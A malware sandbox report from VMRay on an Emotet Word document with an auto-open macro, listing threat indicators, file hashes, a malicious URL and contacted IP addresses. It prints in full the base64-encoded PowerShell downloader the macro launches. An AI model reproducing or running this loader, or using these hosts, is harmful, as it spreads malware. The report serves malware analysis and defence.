2d2fa291...85b4 | VMRay Analyzer Report
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader

emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc

Word Document

Created at 2019-04-14T14:36:00

...

VMRay Threat Indicators (13 rules, 26 matches)

Severity Category Operation Classification
5/5
Local AV Malicious content was detected by heuristic scan -
  • Local AV match on Sample File for "C:\Users\aETAdzjz\Desktop\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc".
    ...
5/5
File System Known malicious file Downloader
  • File "C:\Users\aETAdzjz\Desktop\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc" is a known malicious file.
    ...
4/5
Process Tries to create process -
  • Creates process "powershell -e KAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIAAgAGkATwAuAHMAVABSAEUAYQBNAFIAZQBhAGQAZQBSACgAKAAgAG4ARQB3AC0ATwBCAEoAZQBjAFQAIABJAE8ALgBjAG8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAEUAZgBsAGEAVABFAHMAdAByAGUAYQBNACgAIABbAGkAbwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAYQBNAF0AIABbAEMAbwBuAFYAZQByAFQAXQA6ADoAZgBSAE8ATQBCAEEAcwBlADYANABzAFQAcgBJAE4AZwAoACgAJwBYAFoASgBSAGIANQBzACcAKwAnAHcAJwArACcARQAnACsAJwBNAGUALwAnACsAJwBDAGcAJwArACcAOQBJAFQAcABRAEIAaQA4AFIARABWACcAKwAnADQAJwArACcAVABVAGMAMQBoAFEAWAAnACsAJwByAGEAaABGACcAKwAnAFEAVwBoACcAKwAnAFMAaABWAHgARABuACcAKwAnAEMAZwBOACcAKwAnAHMAJwArACcASQBPACcAKwAnAHoAaAAnACsAJwBUAGwAdQAnACsAJwA4AC8AWgAyAGsAYQB0ACcAKwAnAEgANgAnACsAJwAzAGYALwBjAC8AMwBPACcAKwAnADcAJwArACcAdgAnACsAJwBWAGMAJwArACcANQBkAEIAJwArACcAQQBtACcAKwAnAEYATQB1ACcAKwAnAGkAVgBBAGIAcQBBAGoAawAnACsAJwBUAHQAJwArACcAawBZAEUANABRAEMAegBTAGUAMwBCADIAUQBhAGUAYwBIAGEAbgArAEwAdQAxAFgAUABVAGUAagAnACsAJwBJAEwAUgBpAEYAegAnACsAJwBCAEsAawAxAFgAcQAnACsAJwA0ACcAKwAnAEQANAAnACsAJwBJACcAKwAnAGUAbABjACcAKwAnAEsAeABVAGsAJwArACcAbwB5AFgAbQBsAFUAUABwAE0AJwArACcAdgBnAFIAJwArACcAawA4ACcAKwAnAEoAbwBXADIAJwArACcAQgAnACsAJwBjAEgAMwB1AHoAJwArACcAWgAnACsAJwA0AGUARwBWACcAKwAnAHIAJwArACcATwBlAEoAcAAnACsAJwBHAEsAVQB0AG0ARABqAEQAegA2AGoAZQB2AHAATwBDACcAKwAnADQAOQAnACsAJwBHACcAKwAnADAAcwB0AGIAWQBZAEcAOQB3ACcAKwAnADcARgBEADQAbwBnACcAKwAnACsAYQBiAHgAQgBzAEQALwA4ACcAKwAnAHAAWgBiAEcAJwArACcAagAnACsAJwA0AEUASwBPACcAKwAnAEcAdgAnACsAJwBkACcAKwAnADgAdwBsACcAKwAnAEgASgBmADQARwBWAFUAYgByAFMAaQB0AHQAVQAnACsAJwBGAFcAJwArACcAUwBQAEwAJwArACcAYgB2AGgARQAyACcAKwAnAC8AJwArACcAawA2ACcAKwAnAE8AMwBIAHEAcABIAGkAYwAnACsAJwAvAFAAZAA1AG0AJwArACcAZABBAC8ATgA5AEQAegAvAFcATQBQAEoAQgA1ACcAKwAnADUATgBiADUAOABqAGwAUABZADMASwAnACsAJwBnAFkASgBLAFMAVwBqACcAKwAnAG0AeQBLADIAJwArACcAawBLAFcAZQAnACsAJwBqAEUARAAnACsAJwBnAG4AdgA3ACcAKwAnAEUAVQB1AE8AMQBwAFEASwBHAE8AUwAnACsAJwBXACcAKwAnAHAAJwArACcATQAwAFMAYQA0ACcAKwAnAEsAJwArACcAZgAnACsAJwB3AEcAcwBBAEoATAAnACsAJwBZAFIAVABIAGQASAArADIAcwBkAHUASwBhACcAKwAnADkANwBnAGcAVAAyAFQAeABuAHIARQBnAFAAcAAnACsAJwA2ACcAKwAnAFEAUgBGAGMAbgBGAFcAdABuACcAKwAnADcAJwArACcAcgBwAFkAbgBvAEIAbQBoAGMATwBGADgAJwArACcAMgBaACcAKwAnADUAZgB0ACcAKwAnAGIAagBuAC8AUAByACcAKwAnAFUAdgB4AEUARwB0ACcAKwAnAEgATABhAHIAJwArACcAKwAyACcAKwAnAFkAVABmACcAKwAnACsAJwArACcAaQAnACsAJwAvAFAAVwAwAGIANQAnACsAJwA1AEQAVwAnACsAJwBYAEcAawBqAHcAJwArACcAbQBEAEYASwBnAGUAVgBHAFEAYQBGAE0AJwArACcANwBzADEAbQBLACcAKwAnADIAdAB0AG8AZgBMAG0AeAAnACsAJwBmAG8AJwArACcAKwBpACcAKwAnADAAYQAzAGoATgBlACcAKwAnAGkARQBYACsAJwArACcAMgBaACcAKwAnAE8AKwBlAE4AbQBHAFMASABIADAARwA3AGMAVABBAGgAbQBKACcAKwAnAGgAVQBLACcAKwAnAFEARABRAGsAawBRADcAKwArAEkAdQB1AGwAeABZAHAAVgBsADcAdgBsAHoAYwBSADYAQwAwAHMAJwArACcANgAnACsAJwBaAFcAawBGADkALwBGAEkAbgArAEEAJwArACcAZwA9AD0AJwApACAAKQAsAFsASQBvAC4AYwBvAG0AUABSAGUAUwBTAGkAbwBuAC4AYwBPAE0AUABSAGUAcwBzAGkATwBOAE0AbwBEAEUAXQA6ADoAZABFAGMAbwBNAHAAUgBFAFMAcwAgACkAIAApACAALABbAHQAZQBYAHQALgBlAG4AQwBPAGQASQBOAEcAXQA6ADoAYQBTAEMAaQBpACkAKQAuAHIARQBhAGQAVABPAEUAbgBkACgAIAApACAAfAAmACgAIAAkAFYARQByAEIATwBTAEUAcAByAGUARgBFAFIAZQBOAGMAZQAuAHQATwBTAFQAcgBpAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAG8ASQBuACcAJwApAA==".
    ...
4/5
Network Reads network adapter information -
4/5
Network Associated with known malicious/suspicious URLs -
  • URL "nieuwhoftegelwerken.nl/g9A/Wj/" is known as malicious URL.
    ...
3/5
Network Performs DNS request -
3/5
Network Connects to remote host -
  • Outgoing TCP connection to host "195.8.208.98:80".
    ...
  • Outgoing TCP connection to host "104.31.93.251:443".
    ...
  • Outgoing TCP connection to host "80.172.234.15:80".
    ...
  • Outgoing TCP connection to host "192.115.76.18:80".
    ...
  • Outgoing TCP connection to host "47.89.211.238:443".
    ...
  • Outgoing TCP connection to host "194.8.30.20:80".
    ...
2/5
Network Connects to HTTP server -
2/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro automatically on target "auto" and event "open".
    ...
1/5
Process Creates system object -
  • Creates mutex with name "Global\.net clr networking".
    ...
1/5
Static Unparsable sections in file -
  • Static analyzer was unable to completely parse the analyzed file: C:\Users\aETAdzjz\Desktop\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc.
    ...
1/5
Static Contains suspicious meta data -
1/5
VBA Macro Contains Office macro -

Screenshots

Monitored Processes

Process Graph

Process Graph Legend

Sample Information

ID #594823
MD5 e9ef35217d83597d41a528a7bfd07847 Copy to Clipboard
SHA1 8f14fa07250aa12b4876ef055df604b40fdbf992 Copy to Clipboard
SHA256 2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4 Copy to Clipboard
SSDeep 6144:X77HUUUUUUUUUUUUUUUUUUUT52VYl2ZGP+ZQttKcA:X77HUUUUUUUUUUUUUUUUUUUTCYl2yA4S Copy to Clipboard
Filename emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc
File Size 219.12 KB
Sample Type Word Document
Has VBA Macros True

Analysis Information

Creation Time 2019-04-14 16:36 (UTC+2)
Analysis Duration 00:05:09
Number of Monitored Processes 4
Execution Successful True
Reputation Enabled True
WHOIS Enabled True
Local AV Enabled True
YARA Enabled True
Number of AV Matches 1
Number of YARA Matches 0
Termination Reason Timeout
Tags
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image